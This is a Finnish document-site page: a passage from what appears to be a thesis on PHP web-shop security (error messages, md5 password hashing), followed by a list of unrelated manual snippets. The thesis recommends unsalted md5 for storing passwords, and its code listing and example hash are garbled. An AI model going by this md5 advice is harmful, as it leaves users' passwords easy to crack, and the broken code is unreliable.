niitä näyttää. Ensinnäkin ne sekoittavat tavallista käyttäjää ja saavat palvelun tuntumaan epäluotettavalta. Mahdollisille heikkouksien etsijälle ne tarjoavat liian informatiivista tietoa palvelun rakenteesta ja heikkouksista. Parse error: parse error, unexpected T_STRING, expecting ']' in /home/lgt/dimagia_files/content/login.php on line 39 Listaus 11. PHP:n antama virheilmoitus syntaksivirheestä.

21 18 PHP:n error_reporting -funktiolla voidaan säädellä, minkälaisia virheilmoituksia PHP näyttää. Jos halutaan pitää virheilmoitukset päällä, mutta estää tiettyjä funktioita tulostamasta virheilmoituksia, voidaan funktion edessä. Error_log-funktiolla voidaan lähettää virhe määriteltyyn sähköpostiosoitteeseen tai tallentaa se tiedostoon. Omien virheilmoitusten käyttäminen on suositeltavaa. Alla yksinkertainen esimerkki (listaus 12), joka tulostaa itse muokatun virheilmoituksen ja lähettää oikean virheilmoituksen sähköpostilla ylläpidolle. Omista virheilmoituksista kannattaa tehdä mahdollisimman ylimalkaisia. if (mysql_query($query) == true) { echo "Kaikki OK"; else 1, echo "Virhe palvelussa"; Listaus 12. Omien virheilmoitusten käyttäminen 6.3 Salasanat Salasanoja ei saa tallentaa mihinkään selkokielisinä. Itse olen käyttänyt md5- funktiota salasanojen salaamiseen. Md5-funktio palauttaa 128-bittisen, 32 merkkiä pitkän heksadesimaalisen tiivisteen, sille annetusta syötteestä. Md5 on yksisuuntainen, joten sillä salattua sanaa ei voi enää muuttaa selkokieliseksi. Kun salasanat ovat salattuina näin, ei haittaa, vaikka joku pääsisikin ne näkemään. (http://fi.php.net/manual/en/function.md5.php. Luettu Luettu ) Sanan opinnäytetyö md5-tiiviste: 6129a0852daff69b f50b. Salasanojen on myös oltava tarpeeksi pitkiä ja monimutkaisia, jotta niitä ei voisi arvaamalla selvittää. Verkkokaupassani olen pakottanut käyttäjät valitsemaan sellaisen salasanan, joka koostuu vähintään seitsemästä merkistä ja sisältää

Valtiokonttorin tunnistuspalvelu

Valtiokonttorin tunnistuspalvelu Tila Julkaistu Dok.nro Versio P Sivumäärä 18 Päiväys www.insta.fi Hallintatiedot Yleiset hallintatiedot Nimi Nimikirjoitus Päivämäärä Laatija Hyttinen Henna Tarkastaja Hyväksyjä Arkistoviite Versiohistoria

Lisätiedot

AVOIMEN YLIOPISTON MOODLE-OPAS OPISKELIJALLE

AVOIMEN YLIOPISTON MOODLE-OPAS OPISKELIJALLE AVOIMEN YLIOPISTON MOODLE-OPAS OPISKELIJALLE OHJEITA MOODLEN KÄYTTÖÖN Moodle on avoimeen lähdekoodiin perustuva verkko-oppimisympäristö. Omalta Moodlealueeltasi löydät kurssin materiaalit, tehtävät, uutiset/tiedotteet,

Lisätiedot

Salasanojen hallinta. Salasanojen hallintaopas RESTAURANT ENTERPRISE SOLUTION

Salasanojen hallinta. Salasanojen hallintaopas RESTAURANT ENTERPRISE SOLUTION Salasanojen hallinta Salasanojen hallintaopas RESTAURANT ENTERPRISE SOLUTION Restaurant Enterprise Solution Asiakirjan tarkoitus Tämä asiakirja kertoo tarvittavat säännöt kuinka hallinnoida RES salasanoja

Lisätiedot

Salasanojen turvallinen tallentaminen KeePass ohjelmalla

Salasanojen turvallinen tallentaminen KeePass ohjelmalla Salasanojen turvallinen tallentaminen KeePass ohjelmalla KeePass on vapaasti saatavilla oleva, avoimen lähdekoodin ohjelma, jonka tarkoituksena on auttaa salasanojen hallinnassa. Tämä KeePass ohje on päivitetty

Lisätiedot

Arena-koulutus Sisäänkirjautuminen ja omat sivut. Noora Muurimäki Outi Syväniemi Leila Virta

Arena-koulutus Sisäänkirjautuminen ja omat sivut. Noora Muurimäki Outi Syväniemi Leila Virta Arena-koulutus Sisäänkirjautuminen ja omat sivut Noora Muurimäki Outi Syväniemi Leila Virta 1 Sisäänkirjautuminen ja omat sivut osio: Eri kirjautumistavat verkkokirjastoon, unohtuneet käyttäjätunnukset

Lisätiedot

Järjestelmän kriittisimmille toiminnallisuuksille (listattu alla), toteutetaan 1

Järjestelmän kriittisimmille toiminnallisuuksille (listattu alla), toteutetaan 1 1. Testattavat asiat Järjestelmän kriittisimmille toiminnallisuuksille (listattu alla), toteutetaan 1 selainyhteensopivuustesti käyttäen Suomessa eniten käytössä olevia selaimia. Uuden keräyksen lisääminen

Lisätiedot

Metron. nettikauppaohjeet

Metron. nettikauppaohjeet Metron nettikauppaohjeet 2012 WIHURI OY AARNIO METRO Sivu 1/24 Sisällys 1 Johdanto ja nettikauppaan kirjautuminen 2 2 Tuotehaku 3 2.1 Ean-vähittäisyksikönkoodilla 4 2.2 Tuotteen nimellä 4 2.3 Nimellä ja

Lisätiedot

Visma Nova. Visma Nova ASP käyttö ja ohjeet

Visma Nova. Visma Nova ASP käyttö ja ohjeet Visma Nova Visma Nova ASP käyttö ja ohjeet Oppaan päiväys: 2.2.2012. Helpdesk: http://www.visma.fi/asiakassivut/helpdesk/ Visma Software Oy pidättää itsellään oikeuden mahdollisiin parannuksiin ja/tai

Lisätiedot

OHJE 1 (14) Peruskoulun ensimmäiselle luokalle ilmoittautuminen Wilmassa

OHJE 1 (14) Peruskoulun ensimmäiselle luokalle ilmoittautuminen Wilmassa OHJE 1 (14) Peruskoulun ensimmäiselle luokalle ilmoittautuminen Wilmassa Wilman hakemukset ja muut lomakkeet EIVÄT NÄY mobiililaitteisiin asennettavissa Wilma-sovelluksissa. Huoltajan tulee siis käyttää

Lisätiedot

Valtion yhteisen viestintäratkaisun (Vyvi) Työtila- ja Ryhmä-palvelun kirjautumisohje

Valtion yhteisen viestintäratkaisun (Vyvi) Työtila- ja Ryhmä-palvelun kirjautumisohje Valtiokonttori Ohje 1 (5) Valtion IT-palvelukeskus Vyvi Työtila ja Ryhmä kirjautumisohje 11.10.2013 Valtion yhteisen viestintäratkaisun (Vyvi) Työtila- ja Ryhmä-palvelun kirjautumisohje Tässä ohjeessa

Lisätiedot

INTINU13A6 Java sovellukset

INTINU13A6 Java sovellukset Johdanto Kurssin tavoitteena oli luoda tietokantaa käyttävä websovellus Java EE ohjelmointikielellä, sekä hyödyntää muun muassa servlettejä sekä JSP sivuja ja muita tekniikoita monipuolisesti. Webserverinä

Lisätiedot

Loppukäyttäjän ohje Asennus- ja käyttöohje Mac

Loppukäyttäjän ohje Asennus- ja käyttöohje Mac Loppukäyttäjän ohje Asennus- ja käyttöohje Mac Fujitsun mpollux DigiSign Client on kortinlukijaohjelmisto, jonka avulla voit kirjautua luotettavasti ja turvallisesti organisaation tietoverkkoon tai sähköiseen

Lisätiedot

Mainosankkuri.fi-palvelun käyttöohjeita

Mainosankkuri.fi-palvelun käyttöohjeita Mainosankkuri.fi-palvelun käyttöohjeita Sisällys 1. Johdanto... 1 2. Sisäänkirjautuminen... 1 3. Palvelussa navigointi... 2 4. Laitteet... 2 5. Sisällönhallinta... 4 6. Soittolistat... 7 7. Aikataulut...

Lisätiedot

EU Login. EU Login kirjautuminen. EU Login tilin luominen

EU Login. EU Login kirjautuminen. EU Login tilin luominen EU Login EU Login kirjautuminen EU Login järjestelmä mahdollistaa keskitetyn pääsyn useisiin eri Euroopan Komission verkkosovelluksiin yhdellä käyttäjätunnuksella ja salasanalla. EU login varmistaa identiteettisi

Lisätiedot

OPISKELIJAN REKISTERÖITYMINEN JA TYÖTILA-AVAIMEN KÄYTTÖ. 1. Mitä kaikkea saan käyttööni samoilla tunnuksilla?

OPISKELIJAN REKISTERÖITYMINEN JA TYÖTILA-AVAIMEN KÄYTTÖ. 1. Mitä kaikkea saan käyttööni samoilla tunnuksilla? OPISKELIJAN REKISTERÖITYMINEN JA TYÖTILA-AVAIMEN KÄYTTÖ 1. Mitä kaikkea saan käyttööni samoilla tunnuksilla? Rekisteröitymällä saat käyttöösi koulusi hankkimat sähköiset opetus- ja oppimateriaalit. Pääset

Lisätiedot

MY STANDARD -OHJE. mystandard.hansaworld.com. Standard ERP Pilvipalvelu Sivu 1/6

MY STANDARD -OHJE. mystandard.hansaworld.com. Standard ERP Pilvipalvelu Sivu 1/6 MY STANDARD -OHJE mystandard.hansaworld.com Standard ERP Pilvipalvelu Sivu 1/6 KÄYTTÖÖNOTTO Mikäli Standard ERP -ohjelmistonne on HansaWorldin pilvipalvelimella (hostingissa), teidän on mahdollista hallinnoida

Lisätiedot

Tuplaturvan tilaus ja asennusohje

Tuplaturvan tilaus ja asennusohje Tuplaturvan tilaus ja asennusohje 1. Kirjaudu lähiverkkokauppaan omilla tunnuksillasi tai luo itsellesi käyttäjätunnus rekisteröitymällä Lähiverkkokaupan käyttäjäksi. a. Käyttäjätunnus on aina sähköpostiosoitteesi.

Lisätiedot

EURA 2007 EU:N RAKENNERAHASTOJEN HALLINTAJÄRJESTELMÄ. Projektin toteuttajan yhteystietojen ylläpito ja salasanan vaihtaminen

EURA 2007 EU:N RAKENNERAHASTOJEN HALLINTAJÄRJESTELMÄ. Projektin toteuttajan yhteystietojen ylläpito ja salasanan vaihtaminen EURA 2007 EU:N RAKENNERAHASTOJEN HALLINTAJÄRJESTELMÄ Projektin toteuttajan yhteystietojen ylläpito ja salasanan vaihtaminen Käyttöohje projektien toteuttajille SISÄLLYSLUETTELO 1 Yleistä järjestelmästä...3

Lisätiedot

OPAS KULTA2 -JÄRJESTELMÄN KÄYTTÖÖN

OPAS KULTA2 -JÄRJESTELMÄN KÄYTTÖÖN OPAS KULTA2 -JÄRJESTELMÄN KÄYTTÖÖN 1. Kulta2 -järjestelmän käyttäminen ensimmäistä kertaa s. 1-3 2. Järjestelmään kirjautuminen olemassa olevalla käyttäjätunnuksella ja salasanalla s. 4-5 3. Hakemuksen

Lisätiedot

Action Request System

Action Request System Action Request System Manu Karjalainen Ohjelmistotuotantovälineet seminaari HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos 25.10.2000 Action Request System (ARS) Manu Karjalainen Ohjelmistotuotantovälineet

Lisätiedot

Kaksinkäsin.fi - ohjeet varaamiseen

Kaksinkäsin.fi - ohjeet varaamiseen Kaksinkäsin.fi - ohjeet varaamiseen 27.2.2017 Yleiset ohjeet Kaksinkäsin.fi sivujen yläreunassa on valikko, josta pääsee suoraan useisiin tässä ohjeessa viitattuihin alisivuihin. Kun olet kirjautuneena

Lisätiedot

Yleinen ohjeistus Linux tehtävään

Yleinen ohjeistus Linux tehtävään Yleinen ohjeistus Linux tehtävään Sinulle on toimitettu valmiiksi asennettu HYPER V ympäristö. Tehtäväsi on asentaa tarvittavat virtuaalikoneet, sekä konfiguroida ne ja verkkolaitteet, tehtävän mukaisesti.

Lisätiedot

Epooqin perusominaisuudet

Epooqin perusominaisuudet Epooqin perusominaisuudet Huom! Epooqia käytettäessä on suositeltavaa käyttää Firefox -selainta. Chrome toimii myös, mutta eräissä asioissa, kuten äänittämisessä, voi esiintyä ongelmia. Internet Exploreria

Lisätiedot

Järjestelmäarkkitehtuuri (TK081702)

Järjestelmäarkkitehtuuri (TK081702) Järjestelmäarkkitehtuuri (TK081702) yleistyvät verkkopalveluissa Youtube Google... Avaavat pääsyn verkkopalvelun sisältöön. Rajapintojen tarjoamia tietolähteitä yhdistelemällä luodaan uusia palveluja,

Lisätiedot

VSP webmail palvelun ka yttö öhje

VSP webmail palvelun ka yttö öhje VSP webmail palvelun ka yttö öhje Kirjaudu webmailiin osoitteessa https://webmail.net.vsp.fi Webmailin kirjautumissivu, kirjoita sähköpostiosoitteesi ja salasanasi: Sähköpostin päänäkymä: 1: Kansiolistaus

Lisätiedot

TYÖNTEKIJÄN KÄYTTÖOHJEET - SOKU

TYÖNTEKIJÄN KÄYTTÖOHJEET - SOKU TYÖNTEKIJÄN KÄYTTÖOHJEET - SOKU ETUSIVU Kun tulet SOKU-järjestelmän (SOKU) etusivulle, näet listan avoimista työpaikoista. Yläpalkissa mustalla ympyröitynä on Kirjaudu-nappi Kun klikkaat sitä, pääset kirjautumissivulle.

Lisätiedot

Ohjeet asiakirjan lisäämiseen arkistoon

Ohjeet asiakirjan lisäämiseen arkistoon Ohjeet asiakirjan lisäämiseen arkistoon 1. Jos koneellesi ei vielä ole asennettu Open Office ohjelmaa, voit ladata sen linkistä joka löytyy Arkisto => Asiakirjapohjat sivulta seuran kotisivuilta. Jos ohjelma

Lisätiedot

3 Verkkopalveluarkkitehtuuri

3 Verkkopalveluarkkitehtuuri 3 Verkkopalveluarkkitehtuuri Verkkopalvelun arkkitehtuuri perustuu yleisesti asiakas-palvelin -malliin Tietokantapohjaisessa (verkko)palvelussa asiakas-palvelin -malli toimii seuraavasti: 1. Käyttäjä käyttää

Lisätiedot

SÄHKÖPOSTIOHJE. Opiskelijoiden Office 365 for Education -palveluun

SÄHKÖPOSTIOHJE. Opiskelijoiden Office 365 for Education -palveluun SÄHKÖPOSTIOHJE Opiskelijoiden Office 365 for Education -palveluun 1 Ohjeen nimi Vastuuhenkilö Sähköpostiohje Järjestelmäasiantuntija Pekka Patrikka Voimaantulo 15.08.2013 Muutettu viimeksi 16.08.2013 Tarkistettu

Lisätiedot

Maarit Pirttijärvi Pohjois-Suomen sosiaalialan osaamiskeskus Lapin toimintayksikkö

Maarit Pirttijärvi Pohjois-Suomen sosiaalialan osaamiskeskus Lapin toimintayksikkö Verkkokonsulttipäivä 28.11.2011 Maarit Pirttijärvi j Pohjois-Suomen sosiaalialan osaamiskeskus Lapin toimintayksikkö www.sosiaalijaterveyspalvelut.fi Virtuaalisen sosiaali- ja terveyspalvelukeskuksen käyttäjät

Lisätiedot

Uuden Peda.netin käyttöönotto

Uuden Peda.netin käyttöönotto Sisällysluettelo Uuden Peda.netin käyttöönotto...2 Sisään- ja uloskirjautuminen...2 OmaTila...3 Peda.netin yleisrakenne...4 Työvälineet - Sivut...5 Sivun lisääminen omaan profiiliin:...5 Sivun poistaminen

Lisätiedot

Liitäntä AutoFuturista Koivunen Web Shopiin

Liitäntä AutoFuturista Koivunen Web Shopiin Liitäntä AutoFuturista Koivunen Web Shopiin Päivitetty 16.3.2012 KÄYTTÖÖNOTTO 1. Päivitetään ohjelmaversio 2010.1.1 (tai uudempi) ohjelman tukisivuilta. Ohjeen julkaisuhetkellä versio löytyy tukisivujen

Lisätiedot

F-Secure Mobile Security. Android

F-Secure Mobile Security. Android F-Secure Mobile Security Android F-Secure Mobile Security Sisällysluettelo 3 Sisällys Luku 1:Asennus...5 Asentaminen...6 Aktivointi...7 Luku 2:Luottamuksellisten tietojen suojaaminen...9 Anti-Theftin

Lisätiedot

KULTA2-JÄRJESTELMÄN KÄYTTÖOPAS Liikunta-, kulttuuri-, nuoriso-, hyvinvointiavustukset

KULTA2-JÄRJESTELMÄN KÄYTTÖOPAS Liikunta-, kulttuuri-, nuoriso-, hyvinvointiavustukset KULTA2-JÄRJESTELMÄN KÄYTTÖOPAS Liikunta-, kulttuuri-, nuoriso-, hyvinvointiavustukset Sisällysluettelo: 1. Sisällysluettelo s. 1 2. Kulta2-järjestelmän käyttäminen ensimmäistä kertaa s. 2-3 3. Kirjautuminen

Lisätiedot

TYÖSSÄOPPIMISEN ARVIOINTI JA KOULUTUSKORVAUKSEN HAKU

TYÖSSÄOPPIMISEN ARVIOINTI JA KOULUTUSKORVAUKSEN HAKU TYÖSSÄOPPIMISEN ARVIOINTI JA KOULUTUSKORVAUKSEN HAKU Työpaikkakouluttajan ohje Kun työssäoppimisen arviointi ja koulutuskorvauksen haku ovat ajankohtaisia, saat asiasta ilmoituksen sähköpostiisi. Käy tällöin

Lisätiedot

Julkinen. Suomen Pankin ja Finanssivalvonnan suojattu sähköposti: ulkoisen käyttäjän ohje

Julkinen. Suomen Pankin ja Finanssivalvonnan suojattu sähköposti: ulkoisen käyttäjän ohje Ohje 1 (10) Suomen Pankin ja Finanssivalvonnan suojattu sähköposti: ulkoisen käyttäjän ohje Sisällys 1 Johdanto... 1 2 Suojatun viestin vastaanottaminen... 1 3 Suojatun viestin lukeminen... 2 4 Vastaanotetun

Lisätiedot

VertoLive2.0 -pikaopas

VertoLive2.0 -pikaopas VertoLive2.0 -pikaopas Sisältö: Asiakaspalvelukeskus: 1. Kirjautuminen ja unohtuneen salasanan palauttaminen 2. Salasanan vaihtaminen 3. Tunnusten luominen isännöitsijätoimiston muille käyttäjille 4. Käyttöliittymän

Lisätiedot

Ylläpito toimittaa sinulla sähköpostiisi käyttäjätunnuksen ja salasanan. Tässä esimerkissä

Ylläpito toimittaa sinulla sähköpostiisi käyttäjätunnuksen ja salasanan. Tässä esimerkissä Sivustolle santaskyla.net kirjautuminen Sisällysluettelo Sisällys Sivustolle santaskyla.net kirjautuminen... 1 Sisällysluettelo... 1 Käyttöoikeus... 1 Kirjautunut käyttäjä... 3 Artikkelin kommentointi...

Lisätiedot

MOT-PALVELU OHJE MOT-SANAKIRJAN KÄYTTÖÖN

MOT-PALVELU OHJE MOT-SANAKIRJAN KÄYTTÖÖN MOT-PALVELU OHJE MOT-SANAKIRJAN KÄYTTÖÖN Seinäjoen koulutuskuntayhtymä tarjoaa opiskelijoilleen ja henkilökunnalleen MOT-sanakirjapalvelun. MOT-palvelu on suomalainen Kielikone Oy: n tuottama pilvipalvelu,

Lisätiedot

Kuljetus- ja sovelluskerroksen tietoturvaratkaisut. Transport Layer Security (TLS) TLS:n suojaama sähköposti

Kuljetus- ja sovelluskerroksen tietoturvaratkaisut. Transport Layer Security (TLS) TLS:n suojaama sähköposti Kuljetus- ja sovelluskerroksen tietoturvaratkaisut Transport Layer Security (TLS) ja Secure Shell (SSH) TLS Internet 1 2 Transport Layer Security (TLS) Sopii monenlaisille sovellusprotokollille, esim HTTP

Lisätiedot

Palvelupyyntöjärjestelmä. Asiakkaan ohje

Palvelupyyntöjärjestelmä. Asiakkaan ohje Palvelupyyntöjärjestelmä Asiakkaan ohje Festum Software Oy Palvelupyyntöjärjestelmä asiakkaan ohje 2 ( 8 ) Sisällysluettelo 1. Palvelupyyntöjärjestelmä osana asiakastukea... 3 2. Käytön aloittaminen...

Lisätiedot

Tervetuloa HK Shop:in käyttäjäksi!

Tervetuloa HK Shop:in käyttäjäksi! Tervetuloa HK Shop:in käyttäjäksi! HK Shop on HKSCAN FINLANDin reaaliaikainen tilausjärjestelmä, missä voit mm. tutkia tuotetietoja ja -valikoimaa, tehdä tilauksia, saada tilaushetken tuotesaatavuustiedon

Lisätiedot

Taitaja 2015 Windows finaalitehtävä

Taitaja 2015 Windows finaalitehtävä Taitaja 2015 Windows finaalitehtävä Tehtäväkuvaus Tehtävänäsi on siirtää, asentaa ja määritellä yrityksen Windows -ratkaisuihin perustuva IT-ympäristö. Käytä salasanaa Qwerty123, jos muuta ei ole pyydetty.

Lisätiedot

moodle-opiskelijan opas AD-tunnuksien käyttäjille SISÄLLYSLUETTELO

moodle-opiskelijan opas AD-tunnuksien käyttäjille SISÄLLYSLUETTELO moodle-opiskelijan opas AD-tunnuksien käyttäjille SISÄLLYSLUETTELO 1 Kirjautuminen moodleen...1 2 Kirjautuminen ulos...2 3 Salasanan vaihtaminen...2 4 Oman kuvan lisääminen moodleen...2 5 Uutiset ja keskustelualueet...4

Lisätiedot

Juricon Nettisivu Joomlan käyttöohjeet

Juricon Nettisivu Joomlan käyttöohjeet Juricon Nettisivu Joomlan käyttöohjeet Sisällysluettelo Julkaisujärjestelmä hallinta... 3 Joomla-järjestelmän ylävalikolla on seuraavia:... 3 Valikot... 4 Kategoriat ja artikkelit... 5 Lisäosat ja moduulien

Lisätiedot

Loppukäyttäjän ohje Asennus- ja käyttöohje - Windows

Loppukäyttäjän ohje Asennus- ja käyttöohje - Windows Loppukäyttäjän ohje Asennus- ja käyttöohje - Windows Fujitsun mpollux DigiSign Client on kortinlukijaohjelmisto, jonka avulla voit kirjautua luotettavasti ja turvallisesti organisaation tietoverkkoon tai

Lisätiedot

Omahallinta.fi itsepalvelusivusto

Omahallinta.fi itsepalvelusivusto Turvapaketti Asennusohje 04/2016 Omahallinta.fi itsepalvelusivusto Kirjautuminen Palveluun kirjaudutaan osoitteessa https://oma.ipp.fi/ Palvelun käyttökielien valintapainikkeet (suomi/ruotsi) Käyttäjätunnus

Lisätiedot

Yleinen ohjeistus Linux-tehtävään

Yleinen ohjeistus Linux-tehtävään Yleinen ohjeistus Linux-tehtävään Sinulle on toimitettu valmiiksi asennettu HYPER-V ympäristö, sekä kolme virtuaalikonetta. Tehtäväsi on importata nämä virtuaalikoneet ja konfiguroida ne, sekä verkkolaitteet,

Lisätiedot

Tietoturvan perusteet - Syksy 2005. SSH salattu yhteys & autentikointi. Tekijät: Antti Huhtala & Asko Ikävalko (TP02S)

Tietoturvan perusteet - Syksy 2005. SSH salattu yhteys & autentikointi. Tekijät: Antti Huhtala & Asko Ikävalko (TP02S) Tietoturvan perusteet - Syksy 2005 SSH salattu yhteys & autentikointi Tekijät: Antti Huhtala & Asko Ikävalko (TP02S) Yleistä SSH-1 vuonna 1995 (by. Tatu Ylönen) Korvaa suojaamattomat yhteydentottotavat

Lisätiedot

Mark Summary Form. Taitaja 2012. Skill Number 205 Skill Tietokoneet ja verkot. Competitor Name

Mark Summary Form. Taitaja 2012. Skill Number 205 Skill Tietokoneet ja verkot. Competitor Name Summary Form Skill Number 205 Skill Tietokoneet ja verkot ing Scheme Lock 24-04-2012 14:06:21 Final Lock 26-04-2012 13:05:53 Criterion Criterion Description s Day 1 Day 2 Day 3 Day 4 Total Award A B C

Lisätiedot

Yrityspalvelujärjestelmä

Yrityspalvelujärjestelmä Yrityspalvelujärjestelmä Voit tehdä tyylikkäät nettisivut yrityksellesi YPJ:n sivueditorilla. Sivueditorin avulla on helppoa päivittää ittää ja ylläpitää sivuja silloin, i kun sinulle parhaiten sopii.

Lisätiedot

Aditro Tikon ostolaskujen käsittely versio SP1

Aditro Tikon ostolaskujen käsittely versio SP1 Toukokuu 2012 1 (8) Aditro versio 6.1.2 SP1 Päivitysohje Toukokuu 2012 2 (8) Sisällysluettelo 1. Tehtävät ennen versiopäivitystä... 3 1.1. Ohjelmistomuutosten luku... 3 1.2. Application Pool Identity...

Lisätiedot

FinFamily PostgreSQL installation ( ) FinFamily PostgreSQL

FinFamily PostgreSQL installation ( ) FinFamily PostgreSQL FinFamily PostgreSQL 1 Sisällys / Contents FinFamily PostgreSQL... 1 1. Asenna PostgreSQL tietokanta / Install PostgreSQL database... 3 1.1. PostgreSQL tietokannasta / About the PostgreSQL database...

Lisätiedot

Salasanan vaihto uuteen / How to change password

Salasanan vaihto uuteen / How to change password Salasanan vaihto uuteen / How to change password Sisällys Salasanakäytäntö / Password policy... 2 Salasanan vaihto verkkosivulla / Change password on website... 3 Salasanan vaihto matkapuhelimella / Change

Lisätiedot

Webmail on monipuolinen työkalu jolla voi tehdä paljon muutakin kuin lukea sähköpostia. Tässä ohjeessa on lyhyesti esitelty joitakin sen ominaisuuksia. Peruspostilaatikossa ei ole kaikkia ominaisuuksia,

Lisätiedot

Tietokantojen hallinta

Tietokantojen hallinta Tietokantojen hallinta 1. Yleistä Ensimmäinen vaihe ennen Odoo käytön aloittamista, on varmuuskopioiden tekeminen. Se kannattaa tehdä riittävän usein. Kun Odoo toimii omalla koneella, on tietokantojen

Lisätiedot

3 VIESTIT... 7 3.1 UUSI VIESTI... 7 3.2 VIESTIN LUKEMINEN... 9 3.3 SAAPUNEET JA LÄHETETYT... 9 3.4 KANSIOT... 10 3.5 ROSKAKORI...

3 VIESTIT... 7 3.1 UUSI VIESTI... 7 3.2 VIESTIN LUKEMINEN... 9 3.3 SAAPUNEET JA LÄHETETYT... 9 3.4 KANSIOT... 10 3.5 ROSKAKORI... OHJE HUOLTAJALLE 2 / 22 1 YLEISTÄ TIETOA HELMESTÄ... 3 2 ETUSIVU... 4 2.1 YHTEENVETO... 4 2.2 LUKUJÄRJESTYS / KOTITEHTÄVÄT / HUOMAUTUKSET... 4 2.3 VIESTIT... 6 2.4 KOKEET... 6 3 VIESTIT... 7 3.1 UUSI VIESTI...

Lisätiedot

Oy Oticon Ab. Korvakappale.fi. Käyttöohje

Oy Oticon Ab. Korvakappale.fi. Käyttöohje Oy Oticon Ab Korvakappale.fi Käyttöohje 15 1 Sisältö 2 Yleistä... 3 3 Käyttäjätilit ja kirjautuminen... 3 3.1 Käyttäjätilit... 3 3.2 Pääkäyttäjätilin tilaaminen... 4 3.3 Kirjautuminen... 5 4 Peruskäyttäjän

Lisätiedot

Elisa Vastaussarja Hallintakäyttöliittymä Käyttöohjeet v. 1.1

Elisa Vastaussarja Hallintakäyttöliittymä Käyttöohjeet v. 1.1 Elisa Vastaussarja Hallintakäyttöliittymä Käyttöohjeet v. 1.1 Elisa Oyj 2 (11) Hallintakäyttöliittymä ohjeet 1 Yleistä Yritysten ylläpitäjät Hallinnoivat tiettyjä yrityksen palvelunumeroita Hallinnoivat

Lisätiedot

Tiedostojen jakaminen turvallisesti

Tiedostojen jakaminen turvallisesti Tiedostojen jakaminen turvallisesti Taustaa Tiedostojen jakaminen sähköisesti (File Sharing) on ollut joissakin organisaatioissa ongelmallista hallita. Jaettaviksi halutut viestit ovat liitetiedostoineen

Lisätiedot

Paytrail lisäosa WooCommerce alustalle (c) Webbisivut.org

Paytrail lisäosa WooCommerce alustalle (c) Webbisivut.org Paytrail lisäosa WooCommerce alustalle (c) Webbisivut.org Sisällysluettelo Yleistä...3 Asennus...4 Asetukset...4 Maksun käsittely...4 Päivittäminen...4 Mahdolliset vikatilanteet...5 Yleistä Lisäosan tarkoitus

Lisätiedot

2. Liikennöitsijä saa omaan sähköpostiinsa käyttäjätunnuksen ja salasanan palveluun kirjautumista varten.

2. Liikennöitsijä saa omaan sähköpostiinsa käyttäjätunnuksen ja salasanan palveluun kirjautumista varten. LabkoNet 20.08.2013 LabkoNet järjestelmä Käyttöön tuleva järjestelmä pohjautuu vuodesta 2003 käytössä olleeseen LabkoNet palveluun Nykyistä LabkoNet sivustoa laajennetaan liikennöitsijöiden omalla sivustolla

Lisätiedot

Metsähallituksen Tarjouspalvelu.fi toimittajaportaalin esittely. Taimikonhoidon ja istutuksen hankinnat

Metsähallituksen Tarjouspalvelu.fi toimittajaportaalin esittely. Taimikonhoidon ja istutuksen hankinnat Metsähallituksen Tarjouspalvelu.fi toimittajaportaalin esittely Taimikonhoidon ja istutuksen hankinnat Tarjouspalvelu.fi -toimittajaportaali https://tarjouspalvelu.fi/metsähallitus Tämän palvelun kautta

Lisätiedot

Security server v6 installation requirements

Security server v6 installation requirements CSC Security server v6 installation requirements Security server version 6.x. Version 0.2 Pekka Muhonen 2/10/2015 Date Version Description 18.12.2014 0.1 Initial version 10.02.2015 0.2 Major changes Contents

Lisätiedot

Espoon kaupungin sosiaali- ja terveyspalvelut. Käyttöopas sähköisiin palveluihin

Espoon kaupungin sosiaali- ja terveyspalvelut. Käyttöopas sähköisiin palveluihin Espoon kaupungin sosiaali- ja terveyspalvelut Käyttöopas sähköisiin palveluihin 06.06.2016 1 Sisällys Asioi terveyspalveluissa sähköisesti!... 2 Tietoa palvelusta... 2 Käyttöoikeutesi... 2 Yhteystietosi...

Lisätiedot

EASY Tiedostopalvelin Käyttöopas

EASY Tiedostopalvelin Käyttöopas EASY Tiedostopalvelin Käyttöopas Windows Client www.storageit.fi - Äyritie 8 D, 01510 VANTAA Salorantie 1, 98310 KEMIJÄRVI Sisältö 1. Asennus 2. Yhdistäminen pilveen - Tiedostojen siirto - Paikallisten

Lisätiedot

Uutisjärjestelmä. Vaatimusmäärittely. Web-palvelujen kehittäminen. Versio 1.3

Uutisjärjestelmä. Vaatimusmäärittely. Web-palvelujen kehittäminen. Versio 1.3 Uutisjärjestelmä Vaatimusmäärittely Versio 1.3 Sisällys 1 Muutoshistoria... 4 2 Viitteet... 4 3 Sanasto... 4 3.1 Lyhenteet... 4 3.2 Määritelmät... 4 4 Johdanto...5 4.1 Järjestelmän yleiskuvaus... 5 4.2

Lisätiedot

HYÖDYNNÄ SUBSCRIPTION-ETUSI

HYÖDYNNÄ SUBSCRIPTION-ETUSI HYÖDYNNÄ SUBSCRIPTION-ETUSI KIRJAUTUMINEN SUBSCRIPTION CENTERIIN Autodesk Subscription sopimuksella saat kaikki edut irti ohjelmistostasi. Tässä ohjeessa käydään läpi kuinka kirjaudut Subscription Centeriin,

Lisätiedot

Copyright 2007 Hewlett-Packard Development Company, L.P.

Copyright 2007 Hewlett-Packard Development Company, L.P. Suojaus Käyttöopas Copyright 2007 Hewlett-Packard Development Company, L.P. Microsoft ja Windows ovat Microsoft Corporationin Yhdysvalloissa rekisteröimiä tavaramerkkejä. Tässä olevat tiedot voivat muuttua

Lisätiedot

Nettiposti. Nettiposti käyttöohje

Nettiposti. Nettiposti käyttöohje YKSIKÄÄN ASIAKAS EI OLE MEILLE LIIAN PIENI TAI MIKÄÄN HAASTE LIIAN SUURI. Nettiposti Nettiposti käyttöohje Tässä käyttöohjeessa kuvataan selainkäyttöisen Nettiposti sähköpostiohjelman toiminnot. Käyttöohje

Lisätiedot

Elisa Toimisto 365. Pääkäyttäjän pikaopas

Elisa Toimisto 365. Pääkäyttäjän pikaopas Elisa Toimisto 365 Pääkäyttäjän pikaopas Päivitetty 10/2016 Tämän pikaoppaan avulla pääset alkuun Elisa Toimisto 365 -palvelun käyttöönotossa. Lisää ohjeita löydät osoitteesta http://www.elisa.fi/toimisto365-ohjeet/

Lisätiedot

LUPAHANKKEET RAKENNUSVALVONNAN SAHKÖISESSÄ ASIOINTIPALVELUSSA - KIRJAUTUMINEN

